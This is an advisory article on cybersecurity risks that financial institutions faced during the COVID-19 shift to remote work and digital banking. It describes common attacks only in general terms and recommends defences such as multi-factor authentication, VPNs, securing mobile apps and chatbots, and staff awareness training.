Author: RSBP CA
Date of publication: 17-03-2021

 

While cybersecurity and risks related to cybercrime have been growing priorities for financial institutions (FIs) for over two decades, the COVID-19 crisis has abruptly “changed the game”, forcing FIs to change practices abruptly and adapt to new ways of operating and communicating.

Most FIs have been on a digital journey for some years now with the goal of improving efficiency and leveraging technology to provide better financial services to clients. However, with the COVID-19 pandemic and related containment efforts, the digital agendas of many institutions have been unexpectedly accelerated or reengineered in a time of emergency. Movement away from physical branches and towards more mobile services and digital communication have become a necessity, and these changes in strategy have and will continue to trigger exposure to risks and the implementation of new practices at different levels of FIs.

This new reality is taking hold and impacting all individuals who have to adhere to home confinement and social distancing guidelines amidst the pandemic. Employees have had to shift to remote working arrangements without sufficient preparation or training in understanding and knowing the limitations of and changes required for this new way of working. As new digital channels for clients are utilised during the emergency to access FI services, new threats have emerged and new practices need to be established. For the institutions themselves, the initiation of changes on the structural level are required to ensure that new threats posed by new working models do not come at the cost of security.

Cyber-criminals’ arsenal

Cross-site-scripting attacks, are exploits in which the attacker attaches code onto a legitimate website that will execute when the victim loads the website. For financial institutions, this can be a significant risk if an institution ends up being responsible (or at least perceived as responsible) for infecting their own clients.

Distributed Denial of Service (DDOS) is a malicious attempt to interrupt the normal traffic of a targeted server, service or network by overwhelming it or its surrounding infrastructure with a flood of internet traffic.

Phishing is sending emails through a fake website supposedly from a trusted institution to gather personal identifiable information such as passwords, bank account details, social security numbers, or to infect the computer of the target.  Some phishing approaches are specifically targeted to FI employees, with the idea of getting them to open an attachment or to click on links which then redirect them to a fake website where they are encouraged to share personal identifiable information. Once a cyber-criminal gains access to an employee’s email account, (s)he will be able to:

  • Send emails on behalf of the employee
  • Gain access to customer financial information
  • Access critical company information

Ransomware attacks are caused by a type of malicious software or malware designed to deny access to a computer system or data until a ransom is paid. Such an attack on a financial institution can cause monetary damage.

Cyber threats are not new. However, amid the global COVID-19 pandemic, the increased number of people working from home and/or using digital channels for banking has created an ideal environment for cybercrime to thrive and for cybercriminals to use the weapons at their disposal in a more aggressive way.

Working from home and employee protection

The pandemic has triggered a sudden and rapid increase in employees working from home, as well as an urgent need to provide digital banking services to clients of financial institutions. While cyber threats are not new, amid the global pandemic, cybersecurity-related risks have significantly increased. In particular, the following are key cybersecurity-related challenges:

  1. Exposure to cybercrime for employees working from home
  2. Deployment of secured digital channels for banking service provision
  3. FI ability to detect and respond to cyber threats

While working in an office environment, employees usually adhere to company policies, which include certain controls regarding cybersecurity, such as rules on device set-up, firewall protection, internal network access controls, regular anti-virus updates etc. However, by working from home, employees are working away from the secured office environment, and, therefore, often operate from less secured Wi-Fi networks and from devices that are not set up according to the company’s policy controls. This makes employees more vulnerable to cyber-attacks. Employees working from home are most likely faced with phishing and social engineering attacks. Normally when an employee requires remote access, appropriate training and secured devices are provided. However, with the unexpected and increased demand for remote access to enable employees to work from home, it is possible that adequate protection has not been applied to remote access.

Remote Access to Software

 Financial institutions should consider all remote access as medium to high risk and adhere to the following approaches for secure remote access:

  • Multi-factor authentication for all remote user access, as passwords alone can be easily compromised.

The new standard: multi-factor authentication

Multi-factor authentication is one of the most effective controls you can implement to prevent unauthorized access to computers, applications and online services. Using multiple layers of authentication makes it much harder to access your systems.

Criminals might manage to steal one type of proof of identity (for example, your PIN) but it is very difficult to steal the correct combination of several proofs for any given account.

Multi-factor authentication can use a combination of:

  • Something the user knows (a passphrase, PIN or an answer to a secret question)
  • Something the user physically possesses (such as a card, token or security key)

Something the user inherently possesses (such as a fingerprint or retina pattern)

Within the past 5 years multi factor authentication has gone from a high level security measure to the gold standard in regards of security for online actors.

  • Strong password policies should be in place. A password policy that requires at least a minimum of 6 digits, with a random combination of characters, numbers and lower and upper case letters is stronger.
  • Corporate virtual private networks (VPNs) should be employed instead of utilising remote desktop protocols (RDP) over the internet. Limited and secure access by VPNs can significantly reduce the attack surface if any.
  • The private computers of employees not provided by the FI should be connected adhering to the FI’s policy regarding anti-virus software and anti-spy solutions, as well as subject to the application of certain security settings in web browsers.

What makes an antivirus solution “good”

  1. High detection rate of viruses and other malicious software:
    • Zero-day attacks (viruses taking advantage of security flaws before they are patched)
    • Malware, spyware and viruses
    • Trojans and worms
    • Phishing scams, including those sent via email
  1. Fast scanning engine, allowing users to clean their computers in short amount of time
  2. Has minimal impact on computer performance
  3. Simple to use user interface

Antivirus suites take the hard work off your hands by offering automatic security against a host of threats

  • Secure home Wi-Fi connections should use a stringent security protocol (e.g., WPA2) and change the default user names and passwords on home networking equipment, such as Wi-Fi routers.

Good Practices for virtual meetings

 Remote working has increased reliance on video and audio-conferencing applications, but these tools are increasingly targeted by cybercriminals.  Financial institutions should configure these tools to limit unauthorised access, and to make sure that employees are given guidance on how to use them securely. Financial institutions should establish corporate policies for virtual meeting security and educate staff on following them, as they leverage the technology for meetings with colleagues and clients.

  • All meetings must require an access code or password
  • Do not share meeting IDs on social media unless meeting is intended to be open to the public
  • Limit the reuse of access codes to prevent uninvited eavesdroppers, as codes might have been shared with former employees or past clients 
  • For sensitive topics, use one-time PINs or meeting IDs, and consider multi-factor authentication for joining the meeting
  • Use a waiting room for participants who log in before a meeting starts, and only allow the host to start a meeting
  • Use a tune when attendees log in and ask new attendees to identify themselves
  • If available, use a dashboard to monitor attendees, and identify all generic attendees
  • Do not record the meeting unless it is necessary 
  • If it is a web meeting (with video), remind participants not to share sensitive information

Measures for data loss prevention

 Employees may be using unauthorized personal accounts and applications, such as email accounts, and other unauthorized applications. FIs should remind employees regarding the following:

  • Avoid sending email correspondence from corporate mail accounts to private mail accounts
  • Use only company-approved USB devices on computers used for work
  • Designate how and where sensitive information should be stored, using either external media, the institution’s centralised file server or a cloud-based service
  • Make regular daily backup copies of all valuable information residing on your device. Data backups are crucial to minimise the impact if that data is lost, corrupted, infected, or stolen
  • Ask employees to keep work devices for professional use only and lock their devices when they step away from them. An innocent activity on a work computer could lead to a breach

Reaching clients through digital channels

Digital channels and products have become critical channels for FIs to interact with, engage with, and offer banking services to their clients as the entire sector steers through the uncertainty arising from the pandemic. There has been a spike in the deployment of digital products and channels by financial institutions mainly on the following technologies and platforms below:

  • Mobile apps
  • Chatbots
  • Internet banking

These channels are open and available to the public, allowing anyone to download them. Once registered for a service, a user can immediately use the service for interactions or transactions. These digital banking channels provide convenience and control to the client, but, at the same time, FIs need to guard against having vulnerabilities in such public-facing systems that could be used in orchestrating a cyber-attack.

The urgency of deploying a mobile app should not be a trade-off for fitting security. Each of the above digital channels comes with their own characteristics as described below and requires specific security considerations.

Mobile apps

 Mobile banking apps are a preferred digital channel of choice for many due to the proliferation of mobile devices. Mobile apps allow customers to carry out most banking activities without requiring a visit to a branch, including checking account balances, transferring funds, paying bills, viewing statements, managing cards directly and reaching out to customer support. Over the years and pre-COVID-19, the number of users who transact on mobile apps has been growing at a phenomenal rate, surpassing the number who are transacting at branches in many countries. Amidst the COVID-19 pandemic, mobile apps have experienced a further surge in usage.

With an increase in popularity, comes increased cyber risk. There are three areas within the mobile technology chain where attackers may exploit vulnerabilities to launch a malicious attack, namely: the device, network and the data centre. Device-based attacks target the mobile device itself, exploiting a vulnerability on the device to orchestrate a cyber-attack. For example, an attack can be initiated through phishing or a drive by download, where a visit to a website triggers a download of a malicious code without the knowledge of the user. Network-based attacks, on the other hand, exploit the vulnerabilities on the network through which the mobile device is connected. For example, applications on the mobile device with no encryption for data exchange, when used on an unsecured Wi-Fi network, run the risk of data being intercepted by an attacker eavesdropping on the Wi-Fi network. Data centre attacks target web servers and databases, with the attacker exploiting vulnerabilities in operating systems or applications modules running on the web server.

Chatbots

 Chatbots have been around for a while but are still new to many users. For FIs, chatbots are a highly beneficial technology for interacting daily with customers, with the capability of integrating with AI-powered technology for customer interactions. How this technology is used in the financial sector should be in line with the regulations of the sector, protecting customer information from third parties.

Financial institutions are now deploying chatbots on social media channels such as WhatsApp, Telegram, Viber and Facebook Messenger, with a range of banking services such as account balance checks, funds transfers, viewing mini statements, customer onboarding and the paying of bills.

Internet Banking

 Internet banking has been around and evolving for decades now. Internet banking offers customers an easy way to monitor their finances, allowing them to view payments, check account balances, update personal information and access other banking services online via a secured website. This easy access makes internet banking a common target for hackers and other cyber criminals. Understanding the security issues related to internet banking can help both FIs and clients to stay safe from intruders. The key in addressing vulnerabilities in internet banking is adhering to the guidelines for digital channels addressed in the table below.

Securing digital channels

  • Ensure user identity is verified before any information requested is provided. Two-way verification, either by SMS with a one-time password (OTP), or by authorisation of an email address, is one of the processes that can be implemented for user verification
  • Utilise a biometric authentication process to secure chatbots
  • Ensure communication between chatbots and users are encrypted end to end. WhatsApp, Telegram, and Facebook Messenger all have features that enable an end-to-end encryption of communication. Once the communication is encrypted, this prevents third party access unless physically present on the users' end
  • Chatbots can permanently delete conversations between them and users. Enable and set a time frame for the deletion of conversations containing sensitive data on the chatbot
  • Mobile banking apps should, at a minimum, be developed with the same security standard as any other software
  • The Open Web Application Security Project (OWASP) provides a comprehensive mobile security testing guide. The guideline can be downloaded from the link below. This should serve as a checklist for testing vulnerabilities in a mobile app and applying the needed recommendations: https://owasp.org/www-project-mobile-security-testing-guide/#
  • Use only official apps from app stores. Mobile apps from your app store are less likely to contain malware
  • Keep apps on your mobile phone updated. When a vulnerability is detected in an app, a patch is mostly sent for a fix in the form of an update by the vendor. Keeping your apps and phone software updated ensures maximum security

Adapting the organisation to the new challenges

In an era of increased usage of digital channels and technological transformation, as well as intensified usage of clouds and broader networking capabilities, the threat landscape continues to increase, and threat actors will try to simultaneously attack operational systems and backup capabilities in highly sophisticated ways, potentially leading to enterprise-wide destructive cyber-attacks.

FIs can improve their defense mechanisms and attack readiness by maintaining good cyber hygiene, setting up and maintaining a current incident response strategy, a response architecture and by implementing cyber recovery solutions to mitigate the impact of cyber-attacks.

Good cyber hygiene is a reference to the practices and steps that financial institutions and their employees take to maintain system health and improve online security. Regular implementation of a few key practices can dramatically improve the security of any system:

  • Provide employees with regular communication and awareness messages, including basic security knowledge:
    • Beware of phishing, especially COVID-19 scams and fraudulent COVID-19 websites
    • Know working from home “DOs & DON’Ts”
    • Ensure home Wi-Fi is secure
    • Always use VPN on public Wi-Fi
  • Create a shared channel called #phishing-attacks or an email address to which suspicious emails are forwarded
  • Identify critical financial workers in order to ensure undisrupted availability of services for customers
  • Review contingency plans to address the COVID-19 pandemic
  • Update your company’s Acceptable Use Policy to address working from home and the use of home computer assets
  • Identify functions that can only be undertaken in a secured environment at the office (i.e. not remotely)
  • Review and adapt disaster recovery plans to the current context
  • Provide protective technology on endpoints (hardening, anti-virus, endpoint detection and response, etc.)
  • Enforce software updates
  • Utilise a password manager or run password audits
  • Provide VPN access and disable split tunneling
  • Enable multi-factor authentication everywhere, especially on email accounts

Practical steps for a secure environment

The main solution for the reduction of threats is to make sure that there is a high degree of awareness among employees and, where possible, clients. Several tools can be used for this purpose:

Awareness seminars, where the subject is discussed among employees or clients, including sharing the experience of those who have been subject to an attack. These seminars should be aimed at refreshing employees' knowledge of minimum requirements regarding information security:

Email security, to ensure staff know how to keep their emails secure

  • Avoid opening emails, downloading attachments, or clicking on suspicious links sent from unknown or untrusted sources
  • Verify unexpected attachments or links from people you know by contacting them through another method of communication like a phone call or text message
  • Do not provide personal information to unknown sources like passwords, birthdates, and especially, social security numbers
  • Be especially cognizant of emails with poor design, grammar, or spelling as this can be a sign of a phishing attempt

Password protection

  • Enforce the use of strong passwords on all corporate user accounts
  • Avoid easy-to-guess words like names of pets, children, and spouses as well as common dates like birthdays

Web safety

  • Make sure that any websites that require the insertion of account credentials like usernames and passwords, along with those used to conduct financial transactions, are encrypted with a valid digital certificate to ensure your data is secure. Secure websites like these will typically have a green padlock located in the URL field and will begin with “https.”
  • While FIs employees are working remotely, ensure that they are not using public computers and/or logging into public Wi-Fi connections to log into accounts and access sensitive information
  • Sign out of accounts and shut down computers and mobile devices when not in use

Device maintenance 

  • Keep all hardware and software updated with the latest, patched version
  • Run company-approved antivirus or anti-malware applications on all devices and keep them updated with the latest version
  • Create multiple, redundant backups on daily basis of all critical and sensitive data and keep them stored off the network in the event of a ransomware infection or other destructive malware incident. This will allow you to recover lost files, if needed

Phishing simulations, which consist of sending phishing emails which redirect recipients to a page explaining the issue and what could have been the consequences if this would have been a genuine attack

Technology training, to be used when new technologies are implemented to ensure that procedures are well understood and that the limitations and dangers of using new technologies are clear for users

Information access and distribution. Centralising all communication materials that FI is going to use in crisis management into one place is a great way to make sure that the right information reaches the right employees at the right time. Employee communication platforms (intranets), as well as regular daily emails, can be used for the timely communication of all necessary information.

COVID-19, a catalyst for digital transformation

The COVID-19 crisis has brought about significant change in perceptions towards and the application of remote working and alternative channels in a short timeframe. The ripples of these changes will impact financial institutions for years to come and will influence the shape of a different world: a seamless world in which all channels are used by all types of clients for different purposes, a world in which financial services offered are the same whether you use your mobile or go to a branch. While the COVID-19 crisis did not create these technologies or approaches, the crisis has been a catalyst and an accelerant, creating both the opportunity and necessity for financial institutions to establish today the digital practices and procedures that will be required tomorrow.